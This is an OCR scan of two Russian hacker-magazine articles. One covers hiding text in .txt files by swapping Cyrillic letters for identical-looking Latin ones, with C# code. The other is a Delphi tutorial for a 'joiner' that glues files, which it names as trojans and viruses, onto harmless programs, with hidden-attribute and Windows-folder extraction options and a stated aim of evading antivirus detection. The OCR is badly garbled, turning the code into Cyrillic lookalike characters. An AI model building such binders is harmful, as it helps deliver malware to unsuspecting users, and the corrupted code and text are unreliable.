вычислительных ресурсов взломщика. Стеганография же предоставляет возможность скрыть 
сам факт передачи скрытых данных. 



Что это такое и с чем его едят 

Слово «стеганография» происходит от греческих слов зіедапоз (тайна) 
и дгарЬу (запись) и означает «тайнопись». Получается, что главной 
задачей стеганографии является скрытие факта передачи секретной 
информации. Поискав в интернете стеганографический софт, можно 
обнаружить большое количество про грамм от самых разных разра- 
ботчиков: от продукции крупных компаний, занимающихся безо- 
пасностью, до всяческих «Суперскрывателей Текста В КартинГах», 
основанных на могучем алгоритме Василия Пупловенко, предполо- 
жительно похищенном им из секретной лаборатории ГРУ :}. 

К большинству программ даже прилагаются исходники. Но, про- 
смотрев пару- другую таких «шедевров» программерской мысли, мы 
погружаемся в дежавю: большинство авторов используют пример- 
но один и тот же алгоритм (І_5В,0СТ и д р . ) . Кто-то даже переделыва- 
ет алгоритм под себя, что делает скрытие данных более устойчивым 
к вскрытию, а кто-то просто берет известную идею, прикрепляет к 
ней графические навороты и начинает продавать эту шпионскую 
софтину по заоблачным ценам. Ладно, оставим рассуждения 



преподавателям информатики и политикам (они за это деньги полу- 
чают), а сами перейдем кделу. 

О вредности известных алгоритмов 

В настоящее время самыми популярными контейнерами, применяемыми 
для скрытия информации, являются графические, звуковые и видеофай- 
лы. Причинойтому является несовершенство человеческий органов 
чувств: не каждый заметит небольшое изменение палитры изображения, 
трудно отличитьзвукСО-качества отего трЗ-варианта с очень высоким 
битрейтом. Из этого следует, что в таких да иных содержится избыточность, 
которую можно использовать для своих целей. Эти способы всем хороши, 
только все основные алгоритмы достаточно известны, и выудить скрытое 
послание нетакуж сложно. Единственным выходом является написание 
своего метода скрытия информации, чем мы сейчас и займемся. 

Вперед к новым тайнам 

Итак, мы пришли к выводу, самой лучшей идеей будет создание своего 
собственного алгоритма для скрытия информации. Но перед тем какпри- 
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«Заметить разницу можно только при переходе со стандартного шрифта на какой-нибудь пок- 
расивее, но поскольку в файлах формата Іхі не хранится информация о шрифте и прочих кра- 
сивостях, файл будет открываться со стандартным начертанием, и, следовательно, никто не 
ничего не заподозрит» 



ступить к ее реализации, мы должны ответить на несколько вопросов: 

1) Какой формат файлов мы используем для скрытия? 

2 ) Какиетребования мы предъявим кфайлу? 

3) Изменится ли размер файла? 

4 ) Будетли алгоритм изменяемым, чтобы его можно было переделать 
под себя? 

Поразмыслив немного, я ответил следующим образом: 

1) Мы будем использовать обычныетекстовые файлы формата 1x1. Почему 
именно 1x1? Да потому что этот формату большинства не вызывает 
подозрений, ведь он не содержит управляющих и служебных символов. 
Что написанотекстом, то и есть на самом деле. Имеется и неплохой 
способ проверки: в АЫЗІ-кодировке каждый символ занимает один байт, 
то есть сколько символовтекста, столько байт и должен занимать файл 
(юникод-символ за ни мает два байта). 

2 ) В нашем случае требования будут предъявляться только к объему 
файла (скоро узнаешь, почему). 

3) Алгоритм не будет изменять оригинальный файл ни на байт и будет 
обладать неплохой изменяемостью. 

Так, вроде бы с предварительной подготовкой мы закончили, перейдем к 
описанию самого алгоритма, а затем и непосредственно к кодингу. 

Рождение идеи, или как это работает 

Посмотри на рисунок с изображенными на нем хитрыми буковками. 
Наперв ы йвзгл яд, внемнет ничего необычного и напоминает он 
открытый в стандартном виндовом редакторе файл шрифтов с сакра- 
ментальным «Съешь еще этих мягких французских...». Казалось бы, на 
нем изображен один и тот же текст, просто в разных строчках. Но зачем 
тогда слова епдіізб и гизвіап? Конечно же, на этой картинке изобра- 
жены буквы латинского и русского алфавита, имеющие одинаковое 
начертание. Заметить разницу можнотолько при переходе со стан- 
дартного шрифта на какой-нибудь покрасивее, но поскольку в файлах 
формата 1x1 не хранится информация о шрифте и прочих красивостях, 
файл будет открываться со стандартным начертанием, и, следователь- 
но, никто не ничего не заподозрит (вряд ли кто-то, открывая геабте.іхі, 
сразу будет изменять шрифты). Все привыкли к тому, что в обычном 1x1- 
файле ничего не может содержаться — ни скрытых данных, ни вредо- 
носных программ — только видимый текст, а привычка, как известно, 
великая сила. Этим мы и воспользуемся :). 

Итак, мы получили в свое распоряжение 16 букв (10 больших и 6 малень- 
ких), теперь наметим примерный алгоритм: берем какой-нибудь файл с 
русским текстом (можно книгу), просматриваем все символы и меняем рус- 
ские символы на латинскиетолько нам известным способом. А вот каков 
он будет, зависитлишьоттвоей, дорогой читатель, фантазии. Я, к примеру, 
сделал так, что следующая буква после замененного символа становится 
буквой скрытого текста. Ты же можешь придумать что-нибудь свое. 

Начинаем кодить 

Сейчас мы напишем программу, реализующую мой алгоритм замены, а 
ты потом легко переделаешь ее под себя, так что даже если кто-то и обна- 



ружит факт скрытия информации, прочесть ее он все равно не сможет, 
поскольку не знаеттвой алгоритм кодирования. 

Запускай Ѵівиаі 51и б іо . N еі, выбирай новый проект, в качестве языка 
выбирай С# (алгоритм не зависит от языка и может быть легко перене- 
сен на любой другой). На появившиеся окно кидай ТехіВох в количестве 
двух штук, три Виііоп и два ІаЬеІ. 

Один ТехіВох мы будем использовать для отражения содержимого тексто- 
вого файла, второй — для скрытого послания. Одна кнопка будет служить 
для открытия нужного файла, вторая, соответственно, будет сохранять, ну 
а третья — выводить инфу о разработчике (то есть о тебе). В результате у 
тебя должно получиться нечто похожее на то, что изображено на рисунке 
(конечно, необязательно делатьтакой убогий дизайн) 

Как известно, прежде чем что-то считывать из файла, туда надо что-то 
записать, следовательно, мы должны научить нашу прогу анализировать 
текст, подставлять туда нужные символы и сохранять это чудо в файл. 
Алгоритм сохранения будеттаков: 

Осчитываем сТехіВох’а (в котором хранится обычныйтекст) подряд все 
буквы, сравниваем каждую из них с буквой из другого ТехіВох’а (в котором 
хранится секретный текст); 

2) если они совпадают, то смотрим предыдущую букву (из обычного 
текста), и если она совпадаете одной из букв, которые имеют одинаковое 



|ОТ РЕДАКТО РА| 



В принципетехнология интересная. Но! Однодело использовать ее, 
посылая письма молодой и симпатичной даме через ТНеВаІ (в формате 
ріаіп 1ехі)так, чтобы ее бдительный бойфренд, перлюстрирующий почту, 
не смог ничего запалить :), и совсем другое — использовать для передачи 
действительно секретной информации. Алгоритм, вето нынешнем 
понимании, даже для студента -технаря представляет проблем не больше, 
чем знаменитый шифр Юлия Цезаря (да-да, тот самый «симетричний 
алгоритм шифрування підстановками» :)). 
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> ІП^О 

Первоеупоминание 
о стеганографи- 
ческих методах в 
литературе принад- 
лежит Геродоту, 
описавшему случай 
передачи сооб- 
щения Демартом, 
который соскабли- 
вал воске дощечек, 
писал письмо прямо 
на дереве, а потом 
заново покрывал 
дощечки воском. 

Другой эпизод, 
который относят к 
тем же временам, 

— передача посла- 
ния с использовани- 
ем головы раба. Для 
передачи тайного 
сообщения голову 
раба обривали, 
наносили на кожу 
татуировку и, когда 
волосы отрастали, 
отправляли 
с посланием. 




> СІѴСІ 

На дискеты найдешь 
исходник нашей 
программы, а также 
нес кол ь ко те кето в ы х 
файлов, в которых 
содержится скрытая 
информация и один 
оригинальный файл, 
который ты можешь 
использовать для 
кодирования своего 
текста. 




написание в разныхалфавитах, то заменяем ее русский 
вариант англоязычный аналогом; 

3)записываем полученныйтекств файл; 

Этот алгоритм в реализации на си шарпты можешьувидеть в 
блок- врезке (полный вариант — на нашем диске). 

Теперь поговорим об алгоритме считывания скрытого 



текста из нашего файла. Тут все намного проще: открываем 
файл, если встречается англоязычный вариант нужной 
буквы, то записываем в секретный текст идущий слева 
от нее символ. Но какже быть, если там есть настоящий 
английский текст? Просто очень сложно найти текст полно- 
стью на русском. Думаем, ведьтекст — это набор символов, 



Функция, реализующая сохранение скрытого текста 
вобычномИ л? ТН* Ѵ'.\ * л * ’ ' 



ргіѵаРе ѵоіеі ЬЗаѵеРі1е_С1іск (оЬз есЬ зепбег, 
ЕѵепРАгдз е) 

{ 

// для хранения номера считанного символа 
обычного текста 
іпР пишЬег2 = 0 ; 

// текущий номер символа секретного текста 
іпР пишЬегІ = 0; 

// для хранения промежуточных расчетов 
зРгіпд Решр = " " ; 

Рог (іпР з = 0; з < РЬѴізіЫеТехР . ТехР . 
ЬепдРЬ-1; з++) 

//перебираем все символы обычного текста 

{ 

/ / если текущий элемент секретного текста 
равен 

/ / элементу обычного текста , то . . . 

ІР ( ( РЬНіскІепТехР . 

ТехР [пигпЬегІ] .ТоЗРгіпдО . ТоРГррегО 
= = РЬѴізіЫеТехР . ТехР Ю ] .ТоЗРгіпдО . 

ТоЬррег ( ) ) ) 

{ 

зЫРсЪ. (РЬѴізіЫеТехР .ТехР Ю —1]) 
//проверяем предыдущий символ 
{ 

сазе ' А ' ://если это русская буква А 
Решр = Решр . ЗиЬзРгіпд ( 0 , Решр. 
ЬепдРЬ — 1) ; 

Решр += "А"; //заменяем англоязыч- 
ным вариантом 

// теперь записываем следующие три 

символа 

/ / во избежание совпадения с заме- 
няемыми 

Решр += РЬѴізіЫеТехР . ТехР Ю ] ; 



Решр += РЬѴізіЫеТехР . ТехР [ з +1] ; 
Решр += РЬѴізіЫеТехР . ТехР Ю +2 ] ; 
пишЬег1++; //записали на один 
скрытый символ больше 

3 += 2 ; //перепрыгиваем сразу на два 

символа 

Ьгеак; 

. . . //здесь такой же кусок 
кода, только другие буквы 
беРаиІР : 

Решр += РЬѴізіЫеТехР . ТехР Ю ] ; 

// если ни одна буква не совпадает, 

/ / просто записываем один символ 
Ьгеак; 

} 

} 

еізе Решр += РЬѴізіЫеТехР .ТехР Ю ] ; // 
иначе просто прибавляем его 
) 

//добавляем оставшийся кусок текста после 
манипуляций 

Решр += РЬѴізіЫеТехР . ТехР . 

ЗиЬзРгіпд (пишЬег2 ) ; 

/ /теперь записываем весь этот текст в 
текстбокс 

РЬѴізіЫеТехР . ТехР = Решр; 

ІР ( заѵеРіІеБіаІодІ . ЗЬоѵ\Юіа1од ( ) = = 
БіаІодКезиІР .ОК) 

//и сохраняем результат в файл 

{ 

РіІеЗРгеаш Рз = пеѵ^ РіІеЗРгеаш (заѵеРііеБ 
іаіоді . РіІеБаше , РіІеМобе . СгеаРе) ; 

ЬуРе[] Ьаггау = Рпсобіпд . Ьпісосіе . 
СеРВуРез (РЬѴізіЫеТехР .ТехР) ; 

Рз .ШгіРе (Ьаггау , 0, Ьаггау . ЬепдРЬ) ; 

Рз . Сіозе ( ) і 

} 

1 
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Упрощенные системные требовані 

ІгІеР Репііит или АМС*АіШоп* 1 266 МНг, 
Ѵѵіп^5іл'й е Ме. 2000 или ХР 
Масготейіа НазП РІауег — 
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^ согііпд 



АВСЕНМОРТХ -епдіізіі 
АВСЕНМОРТХ -гіюбіап 
асеорх - епдіізіі 
асеорх - гиззіап 

Схожесть букв 




значит, если это текст, то справа или/и слева должны стоять тоже а н г- 
лийские буквы. Проблема решена: если рядом с найденным символом 
справа или слева будут стоять тоже английские буквы, то это текст и 
дешифровать его не надо. Не очень эффективно, но зато поможет, если 
втексте есть небольшие английские слова. Посмотрим на функцию, 
решающую все эти проблемы и выдирающую секретный текст: 

ргіѵабе збгіпд СебЗесгеСЗутЪоІз ( збгіпд Рехб) 

{ 

// для проверки, английский этот текст или всего лишь 
символ 

Ъооі Ьепд=ба1зе; 

//английский алфавит 

зігіпд зепд = ,, ^ѵлэ^Оуиіоразс 1 :Ё:дЬ^к 12 xсѵЪпт ,, ; 

//строка, куда будут помещены секретные символы 
збгіпд зесгебз=" " ; 

// перебираем все символы переданного нам текста 
іог (іпб і = 0; і < бехб . ЬепдРЬ-1 ; і + +) 

{ 

змІСсЪ. (Сехб [і] ) 

{ 

//и если это один из наших замененных вариантов 
сазе 'А' : 
сазе 'В' : 
сазе ' С ' : 
сазе ' Е ' : 
сазе 'Н' : 
сазе |М ' : 
сазе ' О ' : 
сазе 'Р' : 
сазе 'Т' : 
сазе * X ' : 
сазе ‘а' : 
сазе ' с ' : 



сазе 'е' : 
сазе 1 о ' : 
сазе 'р' : 
сазе ‘х’ : 

II проверяем текст на англоязычность 

Ног (іпб з = 0; з < зепд . ЬепдбЪ.; з++) 

{ 

ІО ( (бехб [і — 1] . ТоЗбгіпд ( ) . ТоЮррег ( ) == 
зепд [ з ] . ТоЗбгіпд ( ) . ТоЮррег ( ) ) 

I I (бехб[і + 1] .ТоЗбгіпдО .То13ррег() == 
зепд [ з ] . ТоЗбгіпд ( ) . ТоЮррег ( ) ) ) 

Ьепд = Огие; 

} 

іі ( !Ьепд) //если текст не английский 

{ 

зесгебз += бехб [і + і] ; 

} 

Ьепд = іаізе; 

Ьгеак; 

} 

} 

гекигп зесгебз; //возвращаем секретный текст 

} 

Конец игры, Бонд 

Подытожим, что же у нас получилось. А получил ось у нас то, что нам и 
хотелось, — прога, которая неплохо скрываеттекст в файлах формата 
*.Ш. Да, при слишком большом объеме скрываемого сообщения она 
не подойдет. Зато, если переделать алгоритм под конкретные нужды, 
можно добиться неплохой производительности и результативности, а 
то, что софтина не изменяет размер модифицированного файла, — это 
большой плюс. Не нужно быть гением, чтобы догадаться, что можно 
скрыть большетекста, если исходный текст был набран в верхнем 
регистре. зс 
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Журнал 
для тех, у кого 

- это профессия! 
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Р Аналитика, интервью, 
опросы, мнения экспертов 
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^ согііпд 



.Іоіпег па ѴѴіпАРІ 



Троянчеги 



Нас не догонят! 



На дельфях 



«5РЮЕРЫМ ЕТ» АНТОНОВ 

/ ЗРШЕК_ЫЕТ@ШВОХ.КІІ / 



А мвАР.тв**АКіми } 

Превед, йожыг 



ЦЩЦД Кодить — это что-то 



Склеим ИХ... 



Вместе веселее! 



Ковыряем свой іоіпег на ѴѴіпАРІ 

Тоіпег — программа, которой пользуется большинство начинающих хакеров. Склеить с игруш- 
кой какой-нибудь полезный файл — что может быть проще и необходимее? Да что говорить, 
стоит только зайти на какой-нибудь форум типа ѵіпдгаб.ги или апЦсЬаСги — и можно встре- 
тить кучу топиков, в которых кодеры слезно просят объяснить принцип написания подобных 
программ. Но, как правило, более продвинутые авторы посылают таких программеров (нет, не 
туда) изучать скучную теорию. В результате у многих отпадает желание творить. Мы не будем 
никуда тебя посылать, а расскажем и покажем, как же все-таки создать такое «чудо». 



Зачем 

Как известно, рі пег’ ы используют для склейки троянов/вирусов/полезно- 
го стаффа (нас стобой интересует только последнее, ведь мы не какие-ни- 
будь преступники) с какой-либо полезной и безобидной программкой. Из 
этого следует, что на подготовленный ріпег’ом файл не должны кричать 
благим матом антивирусы, иначе бедный юзер начнет суетиться и унич- 
тожит весь взвод еще при высадке. Кстати говоря, производители антиви- 
русов очень не любят подобные программы и сзавидной регулярностью 
вносят их имена в свои базы данных. А если рі пег палится антивирусами, 
то пользы отчего натри копейки. 

Теория самого простого іоіпег'а 

Как работают эти чудо-программки? На самом деле все не просто, а очень 
просто. Структуруіоіпег’а можно представить следующим образом: 

1 ) программа -конструктор — собирает специальным образом испол- 
няемый файл, записывая программу-загрузчик, блоке информацией и 



все необходимые файлы; 

2) загрузчик— программа, которая будет загружать все файлы, запи- 
санные в еетеле (позже я объясню подробнее, что подразумевается под 
телом). 

Послеза пуска созданного программой-конструктором файла, загрузчик про- 
читает блоке информацией, в котором есть данные обо всех прикрепленных 
файлах, и затем будет по очереди вытаскивать их из своего тела. Подтелом 
подразумевается часть файла программы-загрузчика. Говоря еще более 
простым языком, все прикрепляемые файлы мы будем просто дописывать в 
конецфайла программы-загрузчика. Чтобы лучше понять принцип действия, 
взгляни на структуру создаваемого программой-конструктором файла: 

1. Код программы-загрузчика. Именно он будет выполняться в первую 
очередь. 

2. Блоке информацией. В этом блоке будет содержаться информация обо 
всех прикрепленных файлах (размер, имя, всевозможные опции и т.д.). 

3. Файлы — все прикрепленные файлы. 
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«Все паблик-джойнеры рано или поздно попадают в антивирусные базы. Единственный 
выход — сделать іоіпег самому!» 



Возможности іоіпег’а 

Рассказать, какскрепить два файла, слишком просто, да и неинтересно. 
Поэтому я решил показать тебе, как можно написать программу, которая 
будет склеивать до 1 1 файлов и устанавливать для них различные опции. 
Под опциями я подразумеваю изменение поведения файлов при рассты- 
ковке с программой-загрузчиком. Например, неплохо иметь возможность 
задачи пути для распаковки сразу в определенную папку (например, 
папку с ѴѴІпбоѵѵз) или установки атрибута «скрытый». 

Вездесущий АРІ 

Перед тем как приступить к кодингу, нужно рассмотреть функции, которые 
нам потребуются (программировать мы будем в основном на ѴѴІпАРІ в 
целях сокращения размера экзешника): 

бипсСіоп СоруРіІе ( ІрЕхізСіпдРіІеЫате , 

ІрЫеШіІеБате : РСІіаг; ЬРаіІІРЕхізСз : ВООБ) : ВООБ; 

Как видно из названия, эта функция предназначена для копирования 
файлов. Функции нужно передатьтри параметра: ІрЕхізІіпд РіІеМате 
— имя файла, который будет копироваться; ІрІ\]еѵѵЕІІеІ\Іаппе — имя для 
скопированного файла; ЬРаіІІІЕхізЬ — флаг, говорящий о необходимости 
перезаписи файла в случае его существования. 

РипсБіоп СгеаБеРіІе ( ІрРіІеБате : РСЬаг; 
сІѵДЭезігесІАссезз , сіѵ/ЗііагеМосіе : БШКБ; 
ІрЗесигіБуАББгіЪиБез : РЗесигіСуАССгіЬиСез ; 
сіШгеаБістБізрозіБіоп, сіѵ^РІадзАпсіАССгіЬиСез : БШКБ; 
ііТетрІаБеРіІе : ТНапсІІе) : ТНапсІІе; зБсІсаІІ; 

Функция определена для создания/открытия файлов/объектов. После 
своего выполнения функция вернетуказатель на открытый/созданный 
файл. В качестве параметров ей нужно передать: 

ІрРіІеМате — имя открываемого объекта. В качестве объекта может быть 
обычный путь кфайлу, путь в формате ІІКІС (для открытия файлов, распо- 
ложенных в сети, обращения кустройствам ит.д.). 
сІѵѵйезігесІАссезз —тип доступа к объекту. Здесь можноуказать6ЕІ\ІЕРІС_ 
НЕАй (для чтения) и 6ЕІ\ІЕРІС_ѴѴПІТЕ (для записи). 
сіѵѵБИагеМосіе — устанавливает режим совместного доступа кфайлу. 

Этот параметр принимает одно из следующихзначений: 0 — совместный 
доступ запрещен; ЕИЕ_5НАРЕ_РЕАВ — доступ для чтения; ЕИЕ_5НАПЕ_ 
ѴѴРІТЕ — доступ для записи. Если необходимо установить полный доступ, 
то можно просто сложить два значения (РІ ЕЕ_5НАРЕ_РЕА0+РІ 6Е_ 
5НАРЕ_ѴѴПІТЕ). 

ІрБесигіІуАигіЬіЛез — атрибуты безопасности файла. Указав в этом пара- 
метре піі, мы задаем открываемому объекту атрибуты поумолчанию. 
сіѵѵСгеа*іопОІ5*гіЬіЛіоп — способ открытия файла. Тебе доступно: 
СПЕАТЕ_МЕѴѴ — создается новый файл. Если создаваемый файл сущест- 
вует, то происходит ошибка. 

СРЕАТЕ_АЕѴѴАУ5 — создается новый файл. Здесь наоборот: если файл 
существует, то он будет перезаписан. 



О РЕЫ ЕХІ5ТІ N Ѳ — открывается существующий файл. Если файла не 
существует, возникает ошибка. 

0РЕК1_АЕ\/\/АУ5 — открывается существующий файл. Если его нет, то он 
создается. 

сіѵѵРІадзАпсіАигіЬіЛез — атрибуты и флаги для открытия объекта (скры- 
тый, системный ит.д.). Могутбыть: 

РІРЕ_АТТРІВиТЕ_АРСНІѴЕ — архивный; 

ЕІЕЕ_АТТНІВІГГЕ_С0МРРЕ55ЕВ — сжатый; 

РИЕ_АТТРІВиіТЕ_МОРМАЕ — архивный, сжатый; 

РІ бЕАТТРІ В УТЕН I ВОЕЫ —скрытый; 

ЕІЕЕ_АТТРІВІЯЕ_РЕАВОМЕѴ- только для чтения; 
РІІ_Е_АТТРІВІІТЕ_5У5ТЕМ -системный. 

ЬТетрІаІеРіІе — файл-шаблон, атрибуты которого будут использоваться 
для открытия. 

Как открывать/создавать файлы, мы знаем. Теперь неплохо было бы 
разобраться, как можно перемещаться потелу файла. Для этого в наборе 
ѴѴІпбоѵѵз АРІ естьфункция БеіЕІІеРоіпІег. 

ЕипсБіоп ЗеБРіІеРоіпСег (АРіІе : ТНапсІІе; 

ІБізБапсеТоМоѵе : БопдіпБ; ІрБізБапсеТоМоѵеНідН : 
РоіпБег; сІШоѵеМеБНосІ : БШКБ) : БШКБ ; зБсІсаІІ; 

ИРіІе — дескриптор файла, например, полученный с помощью СгеаіеЕІІе. 
ЮізІапсеТоМоѵе — количество байт, на которое будет передвинута теку- 
щая позиция курсора. 

ІрОізІапсеТоМоѵеНідИ — адрес старшего байта. Используется при пере- 
мещении в очень больших файлах. 

сіѵѵМоѵеМеіЬосі — способ перемещения по файлу. Доступнотри способа: 
РІ ЕЕ_ВЕѲІ N — передвижениеотначала файла; РІІ_Е_СІІРРЕІ\ІТ — пере- 
движение от текущей позиции; ЕІІ_Е_ЕЫВ — от конца файла. 

После выполнения БеіРіІеРоіпІег возвращает младший байт64-разряд- 
ной позиции в файле. 

БипсБіоп КеасІРіІе (НРіІе : ТНапсІІе; 
ѵаг Вир Бег; пЫитЪегОБВуБезТоКеасІ: БШКБ; 
ѵаг ІрБшпЪегОБВуБезКеасІ: БШКБ; 

ІрОѵегІарресі: РОѵегІарресі) : ВООБ; зБсІсаІІ; 

Для чтения из файла в ѴѴІпбоѵѵз предусмотрена функция РеасІЕІІе, для 
записи — ѴѴгііеЕІІе. У этих функций схожие параметры: ЬЕІІе — де- 
скриптор файла; ВиіУег — буфер, в который будут записаны прочитан- 
ные (или из которого будут записаны) данные; пЫитбегОІВуІіезТоРеаб 
— количество данных, которые нужно прочитать/записать; 
ІрІМитЬегОіБуІЮБПеасІ — количество фактически прочтенных/за- 
писанных данных; ІрОѵегІарресі — указатель на структурутипа 
ОУЕРбАРРЕО. 

Послеуспешного выполнения функция возвращаетігие. Поработав с 
файлами, их нужно закрыть. Для закрытия файлов припасена функция 
СІозеНапбІе. Единственное, что ей нужно передать, — дескриптор откры- 
того файла. 
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г? согііпд 




На дискеты най- 
дешь исходники 
к статье и одну из 
статей Ог.КІоипіг’а 
(«Простейший вирус 
на ОеІрЫ своими 
руками»), кото- 
рая поможеттебе 
освоить работу с 
файлами с помощью 
стандартных средств 
ОеІрЫ. 



/«V 







> ѵѵагпіпд 

Никогда не исполь- 
зуй іоіпег'ы с целью 
распространения 
вредоносного ПО! 
Все мы знаем, что 
основное призва- 
ние этих программ 
— миниатюрные 
инсталляторы. 



«14 



Форма программы- 
конструктора 




Файлы ниоткуда 

Кодиміоіпег 

Какяуже говорил, нам придется написатьдве программы: 
программу-конструктор и программу-загрузчик. Начнем с 
программы-конструктора. Запускай ОеІрЫ и создавай пустой 
проект. Форму приведи к виду, представленному на скрине. 
Скажу пару слов о назначении элементов управления на 
форме. В ЫвіѴіеѵѵІ будут добавляться файлы для склейки. 
Все файлы будут приклеиваться к первому в списке. Для 
добавления очередного файла предназначена кнопка 
«Добавить». По ее нажатию будет вызываться 0 реп 0 іа Іод . О 
предназначении кнопки «Склеить», думаю, ты догадаешься 
сам :). СЬескВох’ами можно уста на вливать опции для любо- 
го выделенного файла. Изменения сохраняются по нажатию 
кнопки «Установить опции». 

Приготовления 

Перейди в редактор кода и объяви следующую запись: 

РіІеІпіКесогсІ = гесогсі 

_іі 1 езІ 2 е: аггау [0..10] оі сагсііпаі; 
_Сі1епаше: аггау [0..10] оі зСгіі [100]; 
_аиЪогип: аггау [0..10] об Ьооіеап; 

__міпс1іг : аггау [0..10] оі Ьооіеап; 

_Ыіс1еА1сЦг : аггау [0..10] об Ьооіеап; 
_Ыіс1еКип: аггау [0..10] об Ьооіеап; 
_бі1еСоипб: сагсііпаі; 

Епй; 



Помнишь, я рассказывал тебе о блоке с информацией? 

Вот это он и есть. В этом блоке мы будем хранить имена 
ИіІеЫате), размеры НіІеЗЫе), опции всех файлов, которые 
будут прилеплены (максимум 1 1 ). В разделе объявления 
глобальных переменных объяви переменную_01еНеабег 
типа РіІеІЫПесогсІ. Теперь создавай обработчик события 
ОпСІіск для кнопки «Склеить» и переписывай в него код из 
соответствующей врезки. 

Отбросим рассмотрение вызова диалогов открытия/со- 
хранения в нашем коде и перейдем ксамой главной части. 
Первым делом нам нужно скопировать наш загрузчик в 
место, которое пользователь выбрал в диалоге сохране- 
ния. Именно в этот самый файл мы и будем записывать 
все подготовленные файлы. После функции копирования 
файла (СоруРІІе) я вызываю процедуру Зіеер, которая 
выполняет задержку. Это нужно для того, чтобы наш 
за грузчик успел скопироваться. Дело в том, что функция 
СоруРІІе возвращает результат до того, как файл фактичес- 
ки будет скопирован. 

Послетого как файл загрузчика появится в назначенном месте, 
приступим кзаполнению нашей структуры. Для началаузнаем, 
сколько всего файлов мы будем записывать. Поскольку файлы, 
подготовленные для склейки, хранятся в ЫзіѴіеѵѵ, узнать их 
количество можно, обратившись ксвойству Соипі. Послеэтого 




можно приступить кзаписи информации в структуру. В качес- 
тве информации нас будет интересовать имя и размерфайла. 
Обрати внимание нато, какя получаю размерфайла: 

_бі1еНеа<іег ._1і1езІ2е [і] : =СеДРі1еЗІ2есІ (Ьіз 
бѴіетл;1 . Ібетз . Ібет [ I] . ЗиМбетз . Збгіпдз [ 0 ] + 
ЬізбѴіеѵ^І . Ібетз . Ібет [ I ] .Сарбіоп) ; 

Я использую самописную функцию ѲеіРі ІеБігесІ , которой 
в качестве параметра передается лишь имя файла, а она 
возвращает его размер. Код этой функции я рассматривать 
не буду, поскольку в нем нет ничего сложного. Ктомужеты 
всегда можешь обратиться к исходнику примера, который 
ждеттебя на диске. 

Структура заполнена, вся информация о файлах получена, 
значит, можно приступать к склеиванию всех файлов. Для 
этого я открываю файл программы-загрузчика с помощью 
знакомой тебе СгеаіеРІІе. После успешного открытия 
нужно переместиться в самый конец. В этом мне помогает 
функция ЗеіРіІеРоіпіег. Ты знаешь, что, действуя согласно 
изложенной вышетеории, сначала необходимо записать 
блоке информацией. Именно это и делаем: 

МгіРеРіІе (_с!ізЦРі1е , _1і1еНеас1ег , 
зігеОі (_1і1еНеа<іег) , _Ьетр, піі); 

Записав нашу структуру с необходимой информацией, можно 
запускать цикл, в котором по очереди будут открываться и 
записываться в программу-загрузчик все подготовленные 
пользователем файлы. Копирование файла в файл загрузчи- 
ка реализовано в цикле: 

гереаЪ 

КеасІРіІе (_1гошРі1е , _Ьиіі, 
зігеОі (_Ьиіі) , _Ьетр, піі) ; 

МгіРеРіІе (_с!ізЦРі1е , _Ьиіі, 

_Ьетр, _Дешр2 , піі); 

2егоМетогу ( @_Ьиіі , зігеОі (_Ьиіі) ) ; 

_Ьетр<>102 5 ; 

Для ускорения копирования чтение файла-источника 
происходит блоком. За один раз читается и записыва- 
ется ровно 1 024 байта. После записи очередной порции 
данных нужно позаботиться об очищении памяти. В 
модуле ѴѴІпбоѵѵз.раз для этого предусмотрена процедура 
2егоМегшогу. От настребуется только передать ей два 
параметра: указатель на буфер, который подлежит очистке, 
и его размер. 

На этом месте напрашивается вывод, что программа-конструк- 
тор готова. Но ведь мы не рассмотрели процесс выставления 
опций! Думаю, с нимутебя получится разобраться самостоя- 
тельно, ну а если будеттрудно — пиши мне. Разберемся вместе! 
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Программа-загрузчик 

Конструктор у нас есть. Но вот беда: без программы-загрузчика он 
мало чем полезен, поэтому нам придется создать новый пустой проект 
и написать в нем несколько строчек кода. Для программы-загрузчика 
форма нам не потребуется, поэтому сразу ееудаляй. Вообще, програм- 
ма-загрузчик должна иметь минимальный размер, а значит, нужно 
избавиться от всего лишнего. Удали из ІІзез все модули, оставь лишь 
ѴѴІпсІоѵѵз и ЭЬеІІАРІ. Их нам будет вполне достаточно. Опиши структуру 
Рііеі п^РесогсІ. Она должна вы глядеть точно также, как и в программе- 
конструкторе. Если ты укажешь разные размеры массивов или еще 
чего-нибудь, то наш загрузчик будет работать неправильно (точнее, не 
будет работать вовсе]. 

Создай константу туЭіге. В этой константе у нас будетхраниться наш 
собственный размер, то есть размер программы-загрузчика. На данном 
этапе мы его не знаем, поэтому пока указываем 0. Код программы-загруз- 
чика приведен в соответствующей врезке. Для экономии места я вырезал 
из него код, который отвечает за обработку опций. Полный вариант ты, как 
всегда, можешь найти на диске. 

Сначала нам нужно открыть для чтения файл программы-загрузчика, 
то есть самого себя. После открытия выполняем смещение до адреса, с 
которого начинается код нашего блока с информаций. Какего узнать? 
Очень просто! Поскольку программа-конструктор записала структуру 
с информаций в самый конец программы-загрузчика, нужно просто 
перейти в файле на размер файла загрузчика. Этот размер у нас будет 
определен в объявленной ранее константе. Позиционирование в файле 
опятьже выполняется с помощью ЭеіРІІеРоіпіег. При переходе на 
нужную позицию становится возможным считать структуру. А раз так, то 
после выполнения «РеабРіІеНіІеЗоигсе,_ІіІеНеас1ег, зігеОіЦчІеНеасіег], 
_1етр, піі) ;» вся наша структура будетсчитана. Ну а это значит, что мы 
обладаем всей необходимой информацией для выдергивания ос- 
тальных файлов. Код разбивки тела загрузчика на файлы похож на код 
программы-конструктора, поэтому не будем на нем останавливаться. 
Окончательно дописав код и прочитав предыдущие строки, скомпили- 
руй проект. После завершения компиляции зайди в меню «Ргоіесі -> 
Іпіогтабоп» и обрати внимание на строку Рііе Зіге. 

В ней указан конечный размер ехе нашего проекта. У меня он равен 
1 6384. Именно это число нужно присвоить нашей константе туЭіге. Пос- 
ле этого еще раз сохраняй все изменения в проекте и выполняй компиля- 
цию. Все, наш ріпег полностью готов, а значит, пора переходить ктесту. 

Тестирование 

Перед тестом скопируй скомпилированный файл загрузчика в папку, в ко- 
торой утебя лежит конструктор. Если ты помнишь, то именно в этой папке 
наш конструктор будет его искать. Теперь попробуй запустить конструк- 
тор, добавить несколько файлов и нажать на кнопку «Склеить». Подумав 
пару секунд (время напрямую зависит от размера выбранных тобой 
файлов), программа радостно отрапортуеттебе о завершении процесса 
склейки и создаст новый файл. 

В проводнике появился файл с именем Іез*. Это и есть результат работы 
программы. После его запуска в этой же директории оказываются всепри- 
крепленные нами файлы. Таким образом, программа прошла тест-драйв. 

Что можно улучшить 

В статье я рассмотрел самый простой вариантртег’а. Ноты не должен на 
этом останавливаться. Вот некоторые идеи, которыетакже хорошо было 
